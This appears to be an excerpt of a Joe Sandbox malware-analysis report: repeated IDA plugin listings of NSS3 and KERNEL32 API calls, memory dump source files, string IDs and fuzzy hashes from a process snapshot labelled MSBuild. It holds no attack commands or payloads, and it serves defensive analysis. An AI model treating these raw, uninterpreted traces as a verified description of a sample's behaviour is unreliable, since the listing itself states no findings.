                                                                                        • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C6B6E2C
                                                                                        • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C6B6E47
                                                                                        • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C6B6EB9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nyl
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_DecryptDigestUpdate), ref: 6C6B8526
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B8554
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B8563
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B8579
                                                                                        • PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C6B859A
                                                                                        • PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C6B85B3
                                                                                        • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C6B85CC
                                                                                        • PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C6B85E7
                                                                                        • PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C6B8659
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptDigestUpdate$nyl
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C4C4C
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6C4C60
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4CA1
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C6C4CBE
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4CD2
                                                                                        • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4D3A
                                                                                        • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4D4F
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4DB7
                                                                                          • Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
                                                                                          • Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C4DD7
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6C4DEC
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C4E1B
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C4E2F
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4E5A
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C4E71
                                                                                        • free.MOZGLUE(00000000), ref: 6C6C4E7A
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C4EA2
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C4EC1
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6C4ED6
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C4F01
                                                                                        • free.MOZGLUE(00000000), ref: 6C6C4F2A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C68C4D5
                                                                                          • Part of subcall function 6C6DBE30: SECOID_FindOID_Util.NSS3(6C69311B,00000000,?,6C69311B,?), ref: 6C6DBE44
                                                                                        • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C68C516
                                                                                        • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C68C530
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C68C54E
                                                                                        • NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6C68C5CB
                                                                                        • VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6C68C712
                                                                                        • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C68C725
                                                                                        • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C68C742
                                                                                        • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C68C751
                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C68C77A
                                                                                        • NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C68C78F
                                                                                        • NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C68C7A9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
                                                                                        • String ID: security
                                                                                        APIs
                                                                                        • SECOID_FindOID_Util.NSS3(6C6F3803,?,6C6F3817,00000000), ref: 6C6F450E
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C688298,?,?,?,6C67FCE5,?), ref: 6C6E07BF
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6E07E6
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E081B
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E0825
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,6C6F3817,00000000), ref: 6C6F4550
                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000004,00000000), ref: 6C6F45B5
                                                                                        • SECOID_FindOIDByTag_Util.NSS3(000000BF,00000000), ref: 6C6F4709
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?,00000000), ref: 6C6F4727
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000), ref: 6C6F473B
                                                                                        • PORT_NewArena_Util.NSS3(00000400,?,?,?,?,?,?,?,00000000), ref: 6C6F4801
                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C7B2DA0,?,?,?,?,?,?,?,?,00000000), ref: 6C6F482E
                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C6F48F3
                                                                                        • PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C6F4923
                                                                                        • PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C6F4937
                                                                                        • SECKEY_DestroyPublicKey.NSS3(?,?,?,00000000), ref: 6C6F494E
                                                                                        • PR_SetError.NSS3(FFFFE02F,00000000,?,?,?,00000000), ref: 6C6F4963
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6F4984
                                                                                        • VFY_VerifyDataWithAlgorithmID.NSS3(?,?,?,6C6F21C2,?,?,?), ref: 6C6F499C
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6F49B5
                                                                                        • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,00000000), ref: 6C6F49C5
                                                                                        • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C6F49DC
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6F49E9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Error$Arena_Tag_$AlgorithmFindFree$DestroyHashLookupPublicTable$ConstCurrentDataEncodeItem_ThreadVerifyWith
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C6B4E83
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B4EB8
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B4EC7
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B4EDD
                                                                                        • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C6B4F0B
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B4F1A
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B4F30
                                                                                        • PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C6B4F4F
                                                                                        • PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C6B4F68
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$nyl
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C6B4CF3
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B4D28
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B4D37
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B4D4D
                                                                                        • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C6B4D7B
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B4D8A
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B4DA0
                                                                                        • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C6B4DBC
                                                                                        • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C6B4E20
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nyl
                                                                                        • API String ID: 1003633598-2540521321
                                                                                        • Opcode ID: ac31d96c4b47a4ee604bdcca8671a73444e163339944206d5dd1e1db4b50dde8
                                                                                        • Instruction ID: 49cdfa0617141b6512a9563bb9a238adde6b6171994e95d0f0a13925b9f61431
                                                                                        • Opcode Fuzzy Hash: ac31d96c4b47a4ee604bdcca8671a73444e163339944206d5dd1e1db4b50dde8
                                                                                        • Instruction Fuzzy Hash: 2641E772601105AFDB409F50DE8CBAA3BB5EB4A35DF044434F9087B611DF709A69CB6A
                                                                                        APIs
                                                                                        • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C6D8E01,00000000,6C6D9060,6C7E0B64), ref: 6C6D8E7B
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C6D8E01,00000000,6C6D9060,6C7E0B64), ref: 6C6D8E9E
                                                                                        • PORT_ArenaAlloc_Util.NSS3(6C7E0B64,00000001,?,?,?,?,6C6D8E01,00000000,6C6D9060,6C7E0B64), ref: 6C6D8EAD
                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C6D8E01,00000000,6C6D9060,6C7E0B64), ref: 6C6D8EC3
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C6D8E01,00000000,6C6D9060,6C7E0B64), ref: 6C6D8ED8
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C6D8E01,00000000,6C6D9060,6C7E0B64), ref: 6C6D8EE5
                                                                                        • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C6D8E01), ref: 6C6D8EFB
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7E0B64,6C7E0B64), ref: 6C6D8F11
                                                                                        • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C6D8F3F
                                                                                          • Part of subcall function 6C6DA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C6DA421,00000000,00000000,6C6D9826), ref: 6C6DA136
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6D904A
                                                                                        Strings
                                                                                        • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C6D8E76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                        • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                        • API String ID: 977052965-1032500510
                                                                                        • Opcode ID: ef0a1e7dd69e8057983319917fb645b2fbd73ad58b6be8ed7a42401b81fa2884
                                                                                        • Instruction ID: 8debcf0e3179f7e1759f0adca44af24722e83523095bf77d0d8080988ec19569
                                                                                        • Opcode Fuzzy Hash: ef0a1e7dd69e8057983319917fb645b2fbd73ad58b6be8ed7a42401b81fa2884
                                                                                        • Instruction Fuzzy Hash: 19619EB5D0020A9BDB10CF65DC84AABB7B9FF88358F154128DC18A7711EB32B915CBE5
                                                                                        APIs
                                                                                        • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C74CC7B), ref: 6C74CD7A
                                                                                          • Part of subcall function 6C74CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C6BC1A8,?), ref: 6C74CE92
                                                                                        • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C74CDA5
                                                                                        • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C74CDB8
                                                                                        • PR_UnloadLibrary.NSS3(00000000), ref: 6C74CDDB
                                                                                        • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C74CD8E
                                                                                          • Part of subcall function 6C6705C0: PR_EnterMonitor.NSS3 ref: 6C6705D1
                                                                                          • Part of subcall function 6C6705C0: PR_ExitMonitor.NSS3 ref: 6C6705EA
                                                                                        • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C74CDE8
                                                                                        • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C74CDFF
                                                                                        • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C74CE16
                                                                                        • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C74CE29
                                                                                        • PR_UnloadLibrary.NSS3(00000000), ref: 6C74CE48
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                        • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                        • API String ID: 601260978-871931242
                                                                                        • Opcode ID: 145f6c29fe2fa905bba7677d48f27ab3952ffc4ebfd166182bcc395293e9c0c9
                                                                                        • Instruction ID: 92d0d9b2dcadfa85d8142c29486c029421239ee5b2e3c438eca02d1f035bbad7
                                                                                        • Opcode Fuzzy Hash: 145f6c29fe2fa905bba7677d48f27ab3952ffc4ebfd166182bcc395293e9c0c9
                                                                                        • Instruction Fuzzy Hash: 6111D6A6E0252117E7116B762E4299B38585B4710EF18C934D815E5F02FF22D70C87FA
                                                                                        APIs
                                                                                        • PK11_MakeIDFromPubKey.NSS3(00000000), ref: 6C6C4590
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C471C
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C477C
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6C479A
                                                                                        • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C6C484A
                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C6C4858
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C486A
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C487E
                                                                                          • Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
                                                                                          • Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4
                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C6C488C
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C489C
                                                                                        • PK11_GetInternalSlot.NSS3 ref: 6C6C48B2
                                                                                        • PK11_UnwrapPrivKey.NSS3(00000000,00000130,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,6C6A7F9D), ref: 6C6C48EC
                                                                                        • SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C6C492A
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C4949
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C4977
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C4987
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C499B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item_UtilZfree$K11_$CriticalErrorFreeSectionValue$DestroyEnterFromInternalLeaveMakePrivPrivateSlotUnlockUnwrap
                                                                                        • String ID:
                                                                                        • API String ID: 1673584487-0
                                                                                        • Opcode ID: 55cd4b6a6cc094b8d2bff1dd5b418e2bacee0b29d2f4f5de4e5611c5faa0bde9
                                                                                        • Instruction ID: 7e58ce71319929a06d21931c962b6dc19f3b2a6eb56d55648d77801e89024513
                                                                                        • Opcode Fuzzy Hash: 55cd4b6a6cc094b8d2bff1dd5b418e2bacee0b29d2f4f5de4e5611c5faa0bde9
                                                                                        • Instruction Fuzzy Hash: 29E18D71E002699FDB20CF14CC44BEEBBB5EF04308F1485A9E819A7751E7729A94CF99
                                                                                        APIs
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(*,ol), ref: 6C6F0C81
                                                                                          • Part of subcall function 6C6DBE30: SECOID_FindOID_Util.NSS3(6C69311B,00000000,?,6C69311B,?), ref: 6C6DBE44
                                                                                          • Part of subcall function 6C6C8500: SECOID_GetAlgorithmTag_Util.NSS3(6C6C95DC,00000000,00000000,00000000,?,6C6C95DC,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C8517
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F0CC4
                                                                                          • Part of subcall function 6C6DFAB0: free.MOZGLUE(?,-00000001,?,?,6C67F673,00000000,00000000), ref: 6C6DFAC7
